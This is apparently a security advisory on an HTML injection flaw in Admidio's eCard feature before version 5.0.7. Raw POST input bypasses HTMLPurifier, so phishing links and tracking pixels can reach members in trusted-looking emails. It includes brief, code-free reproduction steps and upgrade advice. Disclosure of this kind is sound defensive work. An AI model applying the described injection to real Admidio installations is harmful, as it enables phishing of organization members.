Admidio HTML Injection Vulnerability in eCard Feature Allows Phishing via Email

A vulnerability in Admidio's eCard send handler prior to version 5.0.7 allows authenticated attackers to inject arbitrary HTML and JavaScript into greeting card emails. This issue arises because the handler uses a raw POST value for the eCard message, bypassing proper sanitization by HTMLPurifier. As a result, injected content can be delivered to other members as part of the eCard, potentially leading to phishing attacks. The vulnerability exploits a flaw in how user input is processed and sanitized before being included in outgoing emails.

Impact

Exploitation of this vulnerability allows for HTML email injection, where arbitrary HTML, including phishing links and tracking pixels, can be sent to other members. The injected content appears to come from a trusted source within the organization, increasing the likelihood of successful phishing attempts.

Reproduction

To reproduce this vulnerability, send an eCard using the eCard send handler with an injected HTML message. The raw HTML injection can include phishing links and tracking pixels. After the eCard is sent, the injected HTML will be rendered in the recipient's email client, bypassing the intended sanitization.

Remediation

Users are advised to update to Admidio version 5.0.7 or later, where this vulnerability has been fixed.